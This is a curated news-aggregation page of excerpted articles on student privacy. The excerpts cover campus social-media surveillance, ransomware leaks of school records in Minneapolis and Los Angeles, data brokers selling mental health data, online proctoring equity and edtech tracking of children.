Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends
32.9K views | +1 today
Follow
Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends
This curated collection includes updates, resources, and research with critical perspectives related to the intersections of educational psychology and emerging technologies in education. The page also serves as a research tool to organize online content (funnel shaped icon allows keyword search). For more on the intersections of privatization and technologization of education with critiques of social impact finance and related technologies, please visit http://bit.ly/sibgamble and http://bit.ly/chart_look. For posts regarding screen time risks to health and development, see http://bit.ly/screen_time and for updates related to AI and data concerns, please visit http://bit.ly/PreventDataHarms.   [Note: Views presented on this page are re-shared from external websites.  The content may not necessarily represent the views nor official position of the curator nor employer of the curator.
Your new post is loading...
Your new post is loading...
Scooped by Roxana Marachi, PhD
September 22, 2022 10:59 AM
Scoop.it!

Tracked: How colleges use AI to monitor student protests // Dallas Morning News

Tracked: How colleges use AI to monitor student protests // Dallas Morning News | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Ari Sen & Derêka K. Bennett

 

The pitch was attractive and simple.

 

For a few thousand dollars a year, Social Sentinel offered schools across the country sophisticated technology to scan social media posts from students at risk of harming themselves or others. Used correctly, the tool could help save lives, the company said.

For some colleges that bought the service, it also served a different purpose — allowing campus police to surveil student protests.

 

During demonstrations over a Confederate statue at UNC-Chapel Hill, a Social Sentinel employee entered keywords into the company’s monitoring tool to find posts related to the protests. At Kennesaw State University in Georgia five years ago, authorities used the service to track protesters at a town hall with a U.S. senator, records show. And at North Carolina A&T, a campus official told a Social Sentinel employee to enter keywords to find posts related to a cheerleader’s allegation that the school mishandled her rape complaint.

 

An investigation by The Dallas Morning News and the Investigative Reporting Program at UC Berkeley’s Graduate School of Journalism reveals for the first time that as more students have embraced social media as a digital town square to express opinions and organize demonstrations, many college police departments have been using taxpayer dollars to pay for Social Sentinel’s services to monitor what they say. At least 37 colleges, including four in North Texas, collectively educating hundreds of thousands of students, have used Social Sentinel since 2015.

The true number of colleges that used the tool could be far higher. In an email to a UT Dallas police lieutenant, the company’s co-founder, Gary Margolis, said it was used by “hundreds of colleges and universities in 36 states.” Margolis declined to comment on this story.

 

The News examined thousands of pages of emails, contracts and marketing material from colleges around the country, and spoke to school officials, campus police, activists and experts. The investigation shows that, despite publicly saying its service was not a surveillance tool, Social Sentinel representatives promoted the tool to universities for “mitigating” and “forestalling” protests. The documents also show the company has been moving in a new and potentially more invasive direction — allowing schools to monitor student emails on university accounts.

 

For colleges struggling to respond to high-profile school shootings and a worsening campus mental health crisis, Social Sentinel’s low-cost tool can seem like a good deal. In addition to the dozens of colleges that use the service, News investigation last year revealed that at least 52 school districts in Texas have adopted Social Sentinel as an additional security measure since 2015, including Uvalde CISD where a gunman killed 19 children and two teachers in May. The company’s current CEO J.P. Guilbault also said their services are used by one in four K-12 schools in the country.

 

Some experts said AI tools like Social Sentinel are untested, and even if they are adopted for a worthwhile purpose, they have the potential to be abused.

 

For public colleges, the use of the service sets up an additional conflict between protecting students' Constitutional rights of free speech and privacy and schools’ duty to keep them safe on campus, said Andrew Guthrie Ferguson, a law professor at American University’s Washington College of Law.

 

“What the technology allows you to do is identify individuals who are associated together or are associated with a place or location,” said Ferguson. “That is obviously somewhat chilling for First Amendment freedoms of people who believe in a right to protest and dissent.”

 

Navigate360, the private Ohio-based company that acquired Social Sentinel in 2020, called The News’ investigation “inaccurate, speculative or by opinion in many instances and significantly outdated.” The company also changed the name of the service from Social Sentinel to Navigate360 Detect earlier this year."...

 

For full post, please visit: 

https://interactives.dallasnews.com/2022/social-sentinel/ 

 

 

Scooped by Roxana Marachi, PhD
April 26, 2023 4:24 PM
Scoop.it!

Students’ psychological reports, abuse allegations leaked by ransomware hackers // NBC News

Students’ psychological reports, abuse allegations leaked by ransomware hackers // NBC News | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

"The leak is a stark reminder of the reams of sensitive information held by schools, and that such leaks often leave parents and administrators with little recourse."

 

By Kevin Collier

Hackers who broke into the Minneapolis Public Schools earlier this year have circulated an enormous cache of files that appear to include highly sensitive documents on schoolchildren and teachers, including allegations of teacher abuse and students’ psychological reports.

The files appeared online in March after the school district announced that it had been the victim of a ransomware cyberattack. NBC News was able to download the cache of documents and reviewed about 500 files. Some were printed on school letterheads. Many were listed in folder sets named after Minneapolis schools. 

 

NBC News was able to view the leaked files after downloading them from links posted to the hacker group’s Telegram account. NBC News has not verified the authenticity of the cache, which totals about 200,000 files, and Minneapolis Public Schools declined to answer specific questions about the documents, instead pointing to its previous public statements

The files reviewed by NBC News include everything from relatively benign data like contact information to far more sensitive information including descriptions of students’ behavioral problems and teachers’ Social Security numbers. 

In addition to leaking the documents, the hacking group appeared to go a step further, posting about the documents on Twitter and Facebook as well as on a website, which hosted a video that opens with an animated short of a flaming motorcycle, followed by 50 minutes of screengrabs of the stolen files. NBC News is not naming the group.

It’s a stark reminder that schools often hold reams of sensitive information, and that such leaks often leave parents and administrators with little recourse once their information is released.

“The fact of the matter is, school districts really should be treating this more like nuclear waste, where they need to identify it and contain it and make sure that access to it is restricted,” said Doug Levin, the director of the K12 Security Information Exchange, a nonprofit that helps schools protect themselves from hackers.'

 

“Organizations that are supposed to be helping to uplift children and prepare them for the future could instead be introducing significant headwinds to their lives just for participating in public school.”

School districts really should be treating this more like nuclear waste.

 

In an update published to the Minneapolis Public Schools website on April 11, Interim Superintendent Rochelle Cox said the school district was working with “external specialists and law enforcement to review the data” that was posted online. Cox also said the district was reaching out to individuals whose information had been found in the leak. Cox also warned about reports that people had received messages telling them their information had been leaked.

 

“This week, we’re seeing an uptick in reports of messages — sometimes multiple messages — sent to people in our community stating something like ‘your social security number has been posted on the dark web,’” Cox wrote. “First — I want to remind everyone to NOT interact with such messages unless you KNOW the sender.”

Cybersecurity experts who are familiar with the leak have said it is among the worst they can remember.

“It’s awful. As bad as I’ve seen,” Brett Callow, an analyst who tracks ransomware attacks for the cybersecurity company Emsisoft, said about the breach.

Ransomware attacks on schools, which often end with the hackers releasing sensitive information, have become frequent across the U.S. since 2015. 

At least 122 public school districts in the U.S. have been hit with ransomware since 2021, Callow said, with more than half — 76 — resulting in the hackers leaking sensitive school and student data.

In such cases, districts often provide parents and students with identity theft protection services, though it’s impossible for them to keep the files from being shared after they’re posted.

The leak has left some Minneapolis parents wondering what to do next.

“I feel like my hands are tied and I feel like the information that the district is giving us is just very limited,” said Heather Paulson, who teaches high school in the district and is the mother of a younger child who attends school in Minneapolis.

 

Lydia Kauppi, a parent of a student in the district, said it’s unsettling to know that her family’s private information may have been shared by hackers.

“It causes anxiety on multiple, multiple fronts for everybody involved,” she said. “And it’s just kind of one of those weird, vague, unsettling feelings because you just don’t know how long do I have to worry about it?”

 


Minneapolis Public Schools, which oversees around 30,000 students across 68 schools, said on April 11 it was continuing to notify people who had been affected by the breach, and that it was offering free credit monitoring and identity theft protection services to victims.

 

Ransomware hackers have drastically escalated their tactics in recent years, increasing how much they ask for and launching efforts to pressure schools to pay up — including by contacting people whose information has been leaked. The group that hacked the Minneapolis schools publicly demanded $1 million. The district announced in March that it had not paid, and ransomware gangs usually only leak large datasets of victims who refuse to pay.


Since last year, various criminal hacker groups have leaked troves of files on some of the largest school districts in the country, including in Los Angeles and Chicago

The leaked Minneapolis files appear to include dossiers on hundreds of children with special needs, identifying each by name, birthday and school. Those dossiers often include pages of details about students, including problems at home like divorcing or incarcerated parents, conditions like Attention Deficit Disorder, documented indications where they appear to have been injured, results of intelligence tests and what medications they take.

Other files include databases of instances where teachers have written up students for behavioral issues, sorted by school, student ID number, behavioral issue and the students’ race. 

The leaked files also include hundreds of forms documenting times when faculty learned that a student had been potentially mistreated. Most of those are allegations that a student had suffered neglect or was physically harmed by a teacher or student. Some are extraordinarily sensitive, and allege incidents like a student being sexually abused by a teacher or by another student. Each report names the victim and cites their birthday and address.

 


In one report, a special education student claimed her bus driver groped her and made her touch him. Minnesota police later charged a man whose name matches the driver named in the report and the date of the incident.

Others describe a teacher accused of having had romantic relationships with two students. Another describes a student whom faculty suspected was the victim of female genital mutilation. NBC News was able to verify that faculty listed in those reports worked for Minneapolis schools, but has not verified those reports.

 

Those files have been promoted online in what experts said is an unorthodox and particularly aggressive manner."... 

 

For full post, please visit: 

https://www.nbcnews.com/tech/security/students-psychological-reports-abuse-allegations-leaked-ransomware-hac-rcna79414 

 

No comment yet.
Scooped by Roxana Marachi, PhD
June 6, 2023 12:28 PM
Scoop.it!

Microsoft to pay $20 million over FTC charges surrounding kids' data collection // CBS News

Microsoft to pay $20 million over FTC charges surrounding kids' data collection // CBS News | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

[CBSNews]

"Microsoft will pay a fine of $20 million to settle Federal Trade Commission charges that it illegally collected and retained the data of children who signed up to use its Xbox video game console.

The agency charged that Microsoft gathered the data without notifying parents or obtaining their consent, and that it also illegally held onto the data. Those actions violated the Children's Online Privacy Protection Act, which limits data collection on kids under 13, the FTC stated.

In a blog post, Microsoft corporate vice president for Xbox Dave McCarthy outlined additional steps the company is now taking to improve its age verification systems and to ensure that parents are involved in the creation of children's accounts for the service. These mostly concern efforts to improve age verification technology and to educate children and parents about privacy issues.

McCarthy also said the company had identified and fixed a technical glitch that failed to delete child accounts in cases where the account creation process never finished. Microsoft policy was to hold that data no longer than 14 days in order to allow players to pick up account creation where they left off if they were interrupted.

The settlement must be approved by a federal court before it can go into effect, the FTC said.

British regulators in April blocked Microsoft's $69 billion deal to buy video game maker Activision Blizzard over worries that the move would stifle competition in the cloud gaming market. The company is now "in search of solutions," Microsoft President Brad Smith said at a tech conference in London Tuesday.

 

Software giant said it has identified and fixed technical glitch that failed to delete child accounts in certain cases."

For original post, please visit:

https://www.cbsnews.com/news/microsoft-settlement-ftc-charges-childrens-data-collection-20-million-dollars/ 

No comment yet.
Scooped by Roxana Marachi, PhD
February 23, 2023 9:32 AM
Scoop.it!

Trove of L.A. Students’ Mental Health Records Posted to Dark Web After Cyber Hack – The 74

Trove of L.A. Students’ Mental Health Records Posted to Dark Web After Cyber Hack – The 74 | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Mark Keierleber

"Update: After this story published, the Los Angeles school district acknowledged in a statement that “approximately 2,000” student psychological evaluations — including those of 60 current students — had been uploaded to the dark web.

Detailed and highly sensitive mental health records of hundreds — and likely thousands — of former Los Angeles students were published online after the city’s school district fell victim to a massive ransomware attack last year, an investigation by The 74 has revealed. 

The student psychological evaluations, published to a “dark web” leak site by the Russian-speaking ransomware gang Vice Society, offer a startling degree of personally identifiable information about students who received special education services, including their detailed medical histories, academic performance and disciplinary records. 


But people are likely unaware their sensitive information is readily available online because the Los Angeles Unified School District hasn’t alerted them, a district spokesperson confirmed, and leaders haven’t acknowledged the trove of records even exists. In contrast, the district publicly acknowledged last month that the sensitive information of district contractors had been leaked. 

Cybersecurity experts said the revelation that student psychological records were exposed en masse and a lack of transparency by the district highlight a gap in existing federal privacy laws. Rules that pertain to sensitive health records maintained by hospitals and health insurers, which are protected by stringent data breach notification policies, differ from those that apply to education records kept by schools — even when the files themselves are virtually identical. Under existing federal privacy rules, school districts are not required to notify the public when students’ personal information, including medical records, is exposed."... 

 

For full article, please visit:

https://www.the74million.org/article/trove-of-l-a-students-mental-health-records-posted-to-dark-web-after-cyber-hack/ 

 

No comment yet.
Scooped by Roxana Marachi, PhD
April 24, 2023 7:22 PM
Scoop.it!

Online Proctoring - Impact on Student Equity // Online Network of Educators (by Francine Van Meter, Cabrillo College)

Online Proctoring - Impact on Student Equity // Online Network of Educators (by Francine Van Meter, Cabrillo College) | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Francine Van Meter

"A fundamental aspect of instruction is the assessment of student learning. The rapid response to move classes online in a pandemic has exposed concerns surrounding the practice of online proctoring. There are many online proctoring features offered by companies such as Proctorio, Examity, Honorlock, and Respondus. The methods that do not require a webcam include locking down the students’ browser so they cannot perform functions such as open another application or tab, use the toolbar, copy/paste, or print screen while taking an exam.

 

The intrusive methods include requesting a photo ID, activating facial recognition, and a live proctor monitoring for sounds and motions. Sessions are typically recorded from the exam start to finish and a live proctor can monitor potential testing infractions as they occur. Proctoring services say exam videos and other data are securely stored. Some store videos in a certified data center server, and then archive them after a defined period of time in line with Family Educational Rights and Privacy Act​ (FERPA) guidelines.

 

According to a 2017 study, it is suggested instructors familiarize themselves with how the services work so they can anticipate students’ concerns. Instructors should identify students’ technical difficulties and try to address them by spending time familiarizing students with how to get ready for and ultimately take their exams. In this pandemic, we know many students lack access to computers and wifi, and the newly issued Chromebooks challenge students to operate another new device and establish wifi access. 

 

Online testing may seem to make things easier but it’s possible the transition to new technology, or the lack of access using current technology that doesn’t include a webcam, may complicate matters and lead to a significant level of discomfort with online proctoring. A survey of 748 students about technology and achievement gaps found about one in five struggled to use the technology at their disposal because of issues such as broken hardware and connectivity problems. Students of color or lower socioeconomic status encountered these difficulties more often. 

 

My colleague, Aloha Sargent, Technology Services Librarian, shared with me an article from Hybrid Pedagogy that asserts “algorithmic test proctoring’s settings have discriminatory consequences across multiple identities and serious privacy implications.” When Texas Tech rolled out online proctoring, they recognized students often take exams in their dorm or bedrooms, and students noted in a campus survey “They thought it was big brother invading their computers.” Some test takers were asked by live proctors to remove pictures from their surroundings and some students of color were told to shine more light on themselves. That’s a disturbing request in my opinion. Many of our community college students occupy multi-family or multi-person residences that include children. These proctoring settings will “disproportionately impact women who typically take on the majority of childcare, breast feeding, lactation, and care-taking roles for their family. Students who are parents may not be able to afford childcare, be able to leave the house, or set aside quiet, uninterrupted blocks of time to take a test.”

At the University of California, Davis, they are discouraging faculty members from using online proctoring this semester unless they have previous experience with such services. “It suggests faculty consider alternatives that will lower students’ anxiety levels during an already stressful time, such as requiring them to reflect on what they learned in the course.” The following article highlights a University of Washington story about adopting Proctorio because of the COVID-19 rapid transition to online.

 

Read the experience of one University of Washington student, Paranoia about cheating is making online education terrible for everyone. The students’ experiences “are another sign that, amid the pandemic, the hurried move to re-create in-person classes online has been far from smooth, especially when it comes to testing.” Live online proctoring is a way to preemptively communicate to students, we don’t trust you. It is a pedagogy of punishment and exclusion.

 

In higher education, traditional exams represent the most appropriate assessment tool. There are ways to cheat on exams no matter what method is used to deploy them. Even a major “NSA-style” proctoring software is not “cheat-proof.” Their sales representative was very candid in showing me how it’s done.  There are alternatives to typical exam questions—often referred to as authentic assessment.

 

According to Oxford Research Encyclopedia, “authentic assessment is an effective measure of intellectual achievement or ability because it requires students to demonstrate their deep understanding, higher-order thinking, and complex problem solving through the performance of exemplary tasks.” 

 

Given the limited timeframe, there will be limits to what you can use now. That’s OK. Consider using Canvas question pools and randomizing questions, or even different versions of the final. For example, replacing six multiple-choice or true-and-false questions with two short-answer items may better indicate how well a question differentiates between students who know the subject matter and those who do not. Or ask students to record a brief spoken-word explanation for the question using the Canvas media tool. Just keep in mind, there are a dozen or more ways to assess learning without “biometric-lockdown-retinal scan-saliva-sample-genetic-mapping-fingerprint-analysis.”

 

References

1. Dimeo, Jean. “Online Exam Proctoring Catches Cheaters, Raises Concerns.” Inside Higher Ed, 2017.

2. Woldeab, Daniel, et al. “Under the Watchful Eye of Online Proctoring.” Innovative Learning and Teaching: Experiments Across the Disciplines, University of Minnesota Libraries Publishing Services’ open book and open textbook initiative, 2017.

3.  ​Schwartz, Natalie. “Colleges flock to online proctors, but equity concerns remain.” Education Dive, April 2020.

 

4. Swager, Shea. “Our Bodies Encoded: Algorithmic Test Proctoring in Higher Education.” Hybrid Pedagogy, April 2020."

 

Francine is the Distance Education Coordinator at Cabrillo College. In addition, she also serves as Cabrillo's Title V Grant Activity Coordinator, CVC-OEI Project Lead, Peer Online Coach Reviewer, and Flex Calendar Coordinator.

Photo by Jakob Owens on Unsplash

 

For original post, please visit: 
https://onlinenetworkofeducators.org/2020/06/01/online-proctoring-impact-on-student-equity/ 

No comment yet.
Scooped by Roxana Marachi, PhD
March 10, 2023 3:59 PM
Scoop.it!

Hackers Use Stolen Student Data Against Minneapolis Schools in Brazen New Threat // The 74 

Hackers Use Stolen Student Data Against Minneapolis Schools in Brazen New Threat // The 74  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Mark Keierleber

"Minneapolis Public Schools appears to be the latest ransomware target in a $1 million extortion scheme that came to light Tuesday after a shady cyber gang posted to the internet a ream of classified documents it claims it stole from the district. 

While districts nationwide have become victims in a rash of devastating ransomware attacks in the last several years, cybersecurity experts said the extortion tactics leveraged against the Minneapolis district are particularly aggressive and an escalation of those typically used against school systems to coerce payments.

In a dark web blog post and an online video uploaded Tuesday, the ransomware gang Medusa claimed responsibility for conducting a February cyberattack — or what Minneapolis school leaders euphemistically called an “encryption event” — that led to widespread digital disruptions. The blog post gives the district until March 17 to hand over $1 million. If the district fails to pay up, criminal actors appear ready to post a trove of sensitive records about students and educators to their dark web leak site. The gang’s leak site gives the district the option to pay $50,000 to add a day to the ransom deadline and allows anyone to purchase the data for $1 million right now.

On the video-sharing platform Vimeo, the group, calling itself the Medusa Media Team, posted a 51-minute video that appeared to show a limited collection of the stolen records, making clear to district leaders the sensitive nature of the files within the gang’s possession. 

“The video is more unusual and I don’t recall that having been done before,” said Brett Callow, a threat analyst with the cybersecurity company Emsisoft. 

A preliminary review of the gang’s dark web leak site by The 74 suggest the compromised files include a significant volume of sensitive documents, including records related to student sexual violence allegations, district finances, student discipline, special education, civil rights investigations, student maltreatment and sex offender notifications. 

 

The video is no longer available on Vimeo and a company spokesperson confirmed to The 74 that it was removed for violating its terms of service, which prohibits users from uploading content that “infringes any third party’s” privacy rights. 

 

As targeted organizations decline to pay ransom demands in efforts to recover stolen files, Callow said the threat actors are employing new tactics “to improve conversion rates.”"... 

 

For full story, please see original post at:

https://www.the74million.org/article/hackers-use-stolen-student-data-against-minneapolis-schools-in-brazen-new-threat/  

No comment yet.
Scooped by Roxana Marachi, PhD
February 22, 2023 2:07 PM
Scoop.it!

Data brokers are now selling your mental health status // The Washington Post

Data brokers are now selling your mental health status // The Washington Post | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Drew Harwell "One company advertised the names and home addresses of people with depression, anxiety, post-traumatic stress or bipolar disorder. Another sold a database featuring thousands of aggregated mental health records, starting at $275 per 1,000 “ailment contacts.”

 

For years, data brokers have operated in a controversial corner of the internet economy, collecting and reselling Americans’ personal information for government or commercial use, such as targeted ads.

 

But the pandemic-era rise of telehealth and therapy apps has fueled an even more contentious product line: Americans’ mental health data. And the sale of it is perfectly legal in the United States, even without the person’s knowledge or consent.

In a study published Monday, a research team at Duke University’s Sanford School of Public Policy outlines how expansive the market for people’s health data has become.

After contacting data brokers to ask what kinds of mental health information she could buy, researcher Joanne Kim reported that she ultimately found 11 companies willing to sell bundles of data that included information on what antidepressants people were taking, whether they struggled with insomnia or attention issues, and details on other medical ailments, including Alzheimer’s disease or bladder-control difficulties.

Some of the data was offered in an aggregate form that would have allowed a buyer to know, for instance, a rough estimate of how many people in an individual Zip code might be depressed.

But other brokers offered personally identifiable data featuring names, addresses and incomes, with one data-broker sales representative pointing to lists named “Anxiety Sufferers” and “Consumers With Clinical Depression in the United States.” Some even offered a sample spreadsheet.

It was like “a tasting menu for buying people’s health data,” said Justin Sherman, a senior fellow at Duke who ran the research team. “Health data is some of the most sensitive data out there, and most of us have no idea how much of it is out there for sale, often for just a couple hundred dollars.”

The Health Insurance Portability and Accountability Act, known as HIPAA, restricts how hospitals, doctors’ offices and other “covered health entities” share Americans’ health data.

But the law doesn’t protect the same information when it’s sent anywhere else, allowing app makers and other companies to legally share or sell the data however they’d like.

Some of the data brokers offered formal customer complaint processes and opt-out forms, Kim said. But because the companies often did not say where their data had come from, she wrote, many people probably didn’t realize the brokers had collected their information in the first place. It was also unclear whether the apps or websites had allowed their users a way to not share the data to begin with; many companies reserve the right, in their privacy policy, to share data with advertisers or other third-party “partners.”

 

Privacy advocates have for years warned about the unregulated data trade, saying the information could be exploited by advertisers or misused for predatory means. Health insurance companies and federal law enforcement officers have used data brokers to scrutinize people’s medical costs and pursue undocumented immigrants.

Mental health data, Sherman said, should be treated especially carefully, given that it could pertain to people in vulnerable situations — and that, if shared publicly or rendered inaccurately, could lead to devastating results.

In 2013, Pam Dixon, the founder and executive director of the World Privacy Forum, a research and advocacy group, testified at a Senate hearing that an Illinois pharmaceutical marketing company had advertised a list of purported “rape sufferers,” with 1,000 names starting at $79. The company removed the list shortly after her testimony.

Now, a decade later, she worries the health-data issue has in some ways gotten worse, in large part because of the increasing sophistication with which companies can collect and share people’s personal information — including not just in defined lists, but through regularly updated search tools and machine-learning analyses.

 

“It’s a hideous practice, and they’re still doing it. Our health data is part of someone’s business model,” Dixon said. “They’re building inferences and scores and categorizations from patterns in your life, your actions, where you go, what you eat — and what are we supposed to do, not live?”

 

The number of places people are sharing their data has boomed, thanks to a surge of online pharmacies, therapy apps and telehealth services that Americans use to seek out and obtain medical help from home. Many mental health apps have questionable privacy practices, according to Jen Caltrider, a researcher with the tech company Mozilla whose team analyzed more than two dozen last year and found that “the vast majority” were “exceptionally creepy.”

Federal regulators have shown a recent interest in more aggressively assessing how companies treat people’s health details. The Federal Trade Commission said this month that it had negotiated a $1.5 million civil penalty from the online prescription-drug service GoodRx after the company was charged with compiling lists of users who had bought certain medications, including for heart disease and blood pressure, and then using that information to better target its Facebook ads.

 

An FTC representative said in a statement that “digital health companies and mobile apps should not cash in on consumers’ extremely sensitive and personally identifiable health information.” GoodRx said in a statement that it was an “old issue” related to a common software practice, known as tracking pixels, that allowed the company to “advertise in a way that we feel was compliant with regulations.”

After the Supreme Court overturned Roe v. Wade last summer and opened the door to more state abortion bans, some data brokers stopped selling location data that could be used to track who visited abortion clinics.

Several senators, including Elizabeth Warren (D-Mass.), Ron Wyden (D-Ore.) and Bernie Sanders (I-Vt.), backed a bill that would strengthen state and federal authority against health data misuse and restrict how much reproductive-health data tech firms can collect and share.

But the data-broker industry remains unregulated at the federal level, and the United States lacks a comprehensive federal privacy law that would set rules for how apps and websites treat people’s information more broadly.

 

Two states, California and Vermont, require the companies to register in a data-broker registry. California’s lists more than 400 firms, some of which say they specialize in health or medical data.

 

Dixon, who was not involved in the Duke research, said she hoped the findings and the Supreme Court ruling would serve as a wake-up call for how this data could lead to real-world risks.

 

“There are literally millions of women for whom the consequences of information bartered, trade and sold about aspects of their health can have criminal consequences,” she said. “It is not theoretical. It is right here, right now.”

 

For full post, please visit: 

https://www.washingtonpost.com/technology/2023/02/13/mental-health-data-brokers/ 

No comment yet.
Scooped by Roxana Marachi, PhD
February 10, 2023 2:24 PM
Scoop.it!

Is the AI a bull*** artist? // Catherine and Katharine

Is the AI a bull*** artist? // Catherine and Katharine | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

"Seems like.

One of the 3 robot papers turned in to me this semester discusses the essay“I Just Wanna Be Average,” Mike Rose’s account of being placed in the vocational track of his Catholic high school after his IQ scores were mixed up with those of another student also named Rose.


The AI gets everything flat wrong:"...

 

For full post, please visit: 

https://catherineandkatharine.wordpress.com/2023/01/07/is-the-ai-a-bull-artist/ 

No comment yet.
Scooped by Roxana Marachi, PhD
May 25, 2022 2:25 PM
Scoop.it!

Remote learning apps shared children’s data at a ‘dizzying scale’ // The Washington Post

Remote learning apps shared children’s data at a ‘dizzying scale’ // The Washington Post | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Drew Harwell

"Millions of children had their online behaviors and personal information tracked by the apps and websites they used for school during the pandemic, according to an international investigation that raises concerns about the impact remote learning had on children’s privacy online.

 

The educational tools were recommended by school districts and offered interactive math and reading lessons to children as young as prekindergarten. But many of them also collected students’ information and shared it with marketers and data brokers, who could then build data profiles used to target the children with ads that follow them around the Web.

Those findings come from the most comprehensive study to date on the technology that children and parents relied on for nearly two years as basic education shifted from schools to homes.

 

Researchers with the advocacy group Human Rights Watch analyzed 164 educational apps and websites used in 49 countries, and they shared their findings with The Washington Post and 12 other news organizations around the world. The consortium, EdTech Exposed, was coordinated by the investigative nonprofit the Signals Network and conducted further reporting and technical review.

What the researchers found was alarming: nearly 90 percent of the educational tools were designed to send the information they collected to ad-technology companies, which could use it to estimate students’ interests and predict what they might want to buy.

Researchers found that the tools sent information to nearly 200 ad-tech companies, but that few of the programs disclosed to parents how the companies would use it. Some apps hinted at the monitoring in technical terms in their privacy policies, the researchers said, while many others made no mention at all.

 

The websites, the researchers said, shared users’ data with online ad giants including Facebook and Google. They also requested access to students’ cameras, contacts or locations, even when it seemed unnecessary to their schoolwork. Some recorded students’ keystrokes, even before they hit “submit.”

The “dizzying scale” of the tracking, the researchers said, showed how the financial incentives of the data economy had exposed even the youngest Internet users to “inescapable” privacy risks — even as the companies benefited from a major revenue stream.

“Children,” lead researcher Hye Jung Han wrote, were “just as likely to be surveilled in their virtual classrooms as adults shopping in the world’s largest virtual malls.”

School districts and the sites’ creators defended their use, with some companies saying researchers had erred by including in their study homepages for the programs, which included tracking codes, instead of limiting their analysis to the internal student pages, which they said contained fewer or no trackers. The researchers defended the work by noting that students often had to sign in on the homepages before their lessons could begin.

  

The coronavirus pandemic abruptly upended the lives of children around the world, shuttering schools for more than 1.5 billion students within the span of just a few weeks. Though some classrooms have reopened, tens of millions of students remain remote, and many now depend on education apps for the bulk of their school days.

Yet there has been little public discussion of how the companies that provided the programs remote schooling depends on may have profited from the pandemic windfall of student data.

The learning app Schoology, for example, says it has more than 20 million users and is used by 60,000 schools across some of the United States’ largest school districts. The study identified code in the app that would have allowed it to extract a unique identifier from the student’s phone, known as an advertising ID, that marketers often use to track people across different apps and devices and to build a profile on what products they might want to buy.

 

A representative for PowerSchool, which developed the app, referred all questions to the company’s privacy policy, which said it does not collect advertising IDs or provide student data to companies for marketing purposes. But the policy also says the company’s website uses third-party tools to show targeted ads to users based on their “browsing history on other websites or on other devices.” The policy did not say which third-party companies had received users’ data.

The policy also said that it “does not knowingly collect any information from children under the age of 13,” in keeping with the Children’s Online Privacy Protection Act, or COPPA, the U.S. law that requires special restrictions on data collected from young children. The company’s software, however, is marketed for classrooms as early as kindergarten, which for many children starts around age 4.

The investigation acknowledged that it could not determine exactly what student data would have been collected during real-world use. But the study did reveal how the software was designed to work, what data it had been programmed to seek access to, and where that data would have been sent.

 

School districts and public authorities that had recommended the tools, Han wrote, had “offloaded the true costs of providing education online onto children, who were forced to pay for their learning with their fundamental rights to privacy.”

The researchers said they found a number of trackers on websites common among U.S. schools. The website of ST Math, a “visual instructional program” for prekindergarten, elementary and middle school students, was shown to have shared user data with 19 third-party trackers, including Facebook, Google, Twitter and the e-commerce site Shopify.

Kelsey Skaggs, a spokeswoman for the California-based MIND Research Institute, which runs ST Math, said in a statement that the company does not “share any personally identifiable information in student records for the purposes of targeted advertising or other commercial purposes” and does not use the same trackers on its student platform as it does on its homepage.

 

But the researchers said they found trackers not just on ST Math’s main site but on pages offering math games for prekindergarten and the first grade.

Google spokesperson Christa Muldoon said the company is investigating the researchers’ claims and will take action if they find any violations of their data privacy rules, which include bans on personalized ads aimed at minors’ accounts. A spokesperson for Facebook’s parent company Meta said it restricts how businesses share children’s data and how advertisers can target children and teens.

The study comes as concern grows over the privacy risks of the educational-technology industry. The Federal Trade Commission voted last week on a policy statement urging stronger enforcement of COPPA, with Chair Lina Khan arguing that the law should help “ensure that children can do their schoolwork without having to surrender to commercial surveillance practices.” 

 

COPPA requires apps and websites to get parents’ consent before collecting children’s data, but schools can consent on their behalf if the information is designated for educational use.

In an announcement, the FTC said it would work to “vigilantly enforce” provisions of the law, including bans against requiring children to provide more information than is needed and restrictions against using personal data for marketing purposes. Companies that break the law, it said, could face fines and civil penalties.

Clearly, the tools have wide impact. In Los Angeles, for example, more than 447,000 students are using Schoology and 79,000 are using ST Math. Roughly 70,000 students in Miami-Dade County Public Schools use Schoology.

 

Both districts said they’ve taken steps to limit privacy risks, with Los Angeles requiring software companies to submit a plan showing how student information will be protected while Miami-Dade said it had conducted a “thorough and extensive” evaluation process before bringing on Schoology last year.

 

The researchers said most school districts they examined had conducted no technical privacy evaluations before endorsing the educational tools. Because the companies’ privacy policies often obscured the extent of their monitoring, the researchers said, district officials and parents often were left in the dark on how students’ data would be collected or used.

Some popular apps reviewed by the researchers didn’t track children at all, showing that it is possible to build an educational tool without sacrificing privacy. Apps such as Math Kids and African Storybook didn’t serve ads to children, collect their identifying details, access their cameras, request more software permissions than necessary or send their data to ad-tech companies, the analysis found. They just offered simple learning lessons, the kind that students have relied on for decades.

Vivek Dave, a father of three in Texas whose company RV AppStudios makes Math Kids, said the company charges for in-app purchases on some word-search and puzzle games designed for adults and then uses that money to help build ad-free educational apps. Since launching an alphabet game seven years ago, the company has built 14 educational apps that have been installed 150 million times this year and are now available in more than 35 languages.

“If you have the passion and just try to understand them, you don’t need to do all this level of tracking to be able to connect with kids,” he said. “My first beta testers were my kids. And I didn’t want that for my kids, period.”

The researchers argued that governments should conduct data-privacy audits of children’s apps, remove the most invasive, and help guide teachers, parents and children on how best to prevent data over-collection or misuse.

Companies, they said, should work to ensure that children’s information is treated differently than everyone else’s, including by being siloed away from ads and trackers. And lawmakers should encode these kinds of protections into regulation, so the companies aren’t allowed to police themselves.

Bill Fitzgerald, a privacy researcher and former high school teacher who was not involved in the study, sees apps’ tracking of students not only as a loss of privacy but as a lost opportunity to use the best of technology for their benefit. Instead of rehashing old ways to vacuum up user data, schools and software developers could have been pursuing fresher, more creative ideas to get children excited to learn.

“We have outsourced our collective imagination and our vision as to what innovation with technology could be to third-party product offerings that aren’t remotely close to the classroom and don’t have our best interests at heart,” Fitzgerald said.

